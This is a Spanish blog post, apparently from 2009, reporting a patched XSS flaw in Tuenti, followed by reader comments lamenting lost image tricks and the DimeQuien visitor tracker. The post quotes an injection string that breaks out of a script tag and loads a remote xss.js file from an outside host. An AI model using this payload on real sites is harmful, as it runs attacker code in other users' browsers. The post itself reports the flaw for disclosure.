Os comentabamos de un fallo en la seguridad de Tuenti que permitía la ejecución de código en los videos de Tuenti y hoy se ha solucionado otro que permitía la ejecución de código usando el truco para insertar imágenes en los mensajes de Tuenti. Tal como se hace eco en Meneame, Rubén Díaz y Sergio C. R. desvelan como se explotaba este fallo en Tuenti.
El fallo era una vulnerabilidad del tipo XSS que al escribir en cualquier tablón, blog, comentario o mensaje del Tuenti algo de la forma;
http://diazr.com/</script><script src=http ://diazr.com/xss.js defer=owned.jpg http://diazr.com/</script>
De esta forma se hacía creer a Tuenti que era una imágen y al intentar cargarla ejecutaría el contenido del archivo ”xss.js”, que podía ser cualquier gusano para tu ordenador o una simple broma para cambiar el estado del Tuenti (xss_status_tuenti.js)
La solución que ha puesto Tuenti ha sindo no permitir el truco para insertar imágenes en los mensajes de Tuenti, por lo que no permite insertar los cósigos de DimeQuien, así que de momento ya no se puede saber quién te visita en Tuenti
Te puede interesar:
Lo Último de Tuenti
- Crea un anuncio en Tuenti para promocionar tu negocio
- Juegos Edgeworld y Red Bull Student Game en Tuenti
- Tuenti abre sus puertas a las revistas digitales
- Tuenti en Português
- Juegos Luno y La Oca en Tuenti
- Tuenti verifica cuentas con DNI electrónico
- Próximamente en Tuenti Juegos: Luno
- Juego Quiz millonario en Tuenti
- Próximamente en Tuenti Juegos: La Oca
- Portada de Tuenti personalizada para Fin de Año con Pacha Ibiza
Plantilla de Wordpress Themes y Internet Marketing Center | Traducida por Fernando
Esta web no pertenece a TUENTI TECHNOLOGIES Datos LSSI - Privacidad
16 respuestas " Vulnerabilidad que permitía ejecución de código en Tuenti "
5 mayo 2009
Oh genial. Así que cada día tenemos menos recursos para hacer personalizable nuestro tuenti. Ahora ya no podemos ni decorar nuestro propio blog debido a la incapacidad del equipo administrativo de TUENTI.
Entonces la solución que dan es cortar por lo sano, no? Joder a toda una comunidad que usa su servicio en vez de buscar soluciones? Incopetencia.
Genial. TUENTI, una red social que cada crece hacia lo negativo
6 mayo 2009
Se fastidió mi blog que era sólo de imágenes.
Tuenti, os voy a mataaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaar.
(A vosotros (tuentiadictos.es) no, me refiero a los de tuenti.com.
Cada vez peor…
Además, me apetecía hacer la bromita esa del estado
8 mayo 2009
no me deja metermr en mi cuenta
14 mayo 2009
[...] que Tuenti ha corregido su último fallo de seguridad no permite usar el truco para insertar imágenes en mensajes (lo que tampoco permite saber [...]
15 mayo 2009
Como puedo visitar un perfil y que no kede constancia…yo creo q debe de haber algo que privatice cuantas veces entras no???
16 mayo 2009
Yo desde aquí propongo que todos hagamos una llamada de atención a Tuenti. Enviad todos los mensajes de queja que podáis, diciendo que queréis que se restablezca la posibilidad de incluir fotos en los tablones, blogs y mensajes.
Si reciben miles de mensajes de ese tipo al final tendrán que buscar la manera de restablecer el servicio sin que haya fallos de seguridad…
17 mayo 2009
Bueno, a mí en relidad lo de las fotos me parece una tontería, para eso ya tenemos el apartado para subir fotos, los comentarios son para comentar; lo que de verdad me ha fastidiado ha sido lo del código de DimeQuién… una pena.
27 mayo 2009
[...] que Tuenti ha solucionado un fallo de seguridad, solo sirven los iconos por defecto (no funcionan los “Emoticonos disponibles” ni [...]
28 mayo 2009
[...] nuevo truco para poner fotos en el blog, tablón o comentarios del Tuenti, ya que desde que se ha corregido un fallo de Tuenti no permitía usar el antiguo truco para poner imágenes ni saber quien visita tu [...]
30 mayo 2009
Quales son los codigos que tienes que poner en el perfil del tuenti para el dimequien?
7 junio 2009
el nuevo tuenti no me deja subir foto le doy a subir y me dale una raya en el medio y se keda asi k le puede pasar me puede responder a mi msn??gracias
8 junio 2009
a mi tampoco me deja subir fotos me pasa igual una lista negra en medio dela pantalla y de hay no avnza nadaa!!!! SOLUCIONN!!????¿¿?? me pasa desde q ya se instalo definitivmente el tuenti nuevooo”·”!
26 agosto 2009
Vamos, no es para tanto, solo hay que subir la foto y una vez la tengas subida ya puedes usarla para decorar, lo unico jodido es lo del dime quien, que ya no funciona
6 septiembre 2009
nesesito saber como es que funsiona esto
27 enero 2010
a ver la pagina me da error de servidor diciendo q es desde dentro,osea interno…pero en cambio metes otro e-mail y si q va..q ocurre???
20 abril 2010
Joder encima la wen de dimequien esta cerrada o se ha caido, imagino que significa que ya se acabó, no se podrán ver las visitas
jooo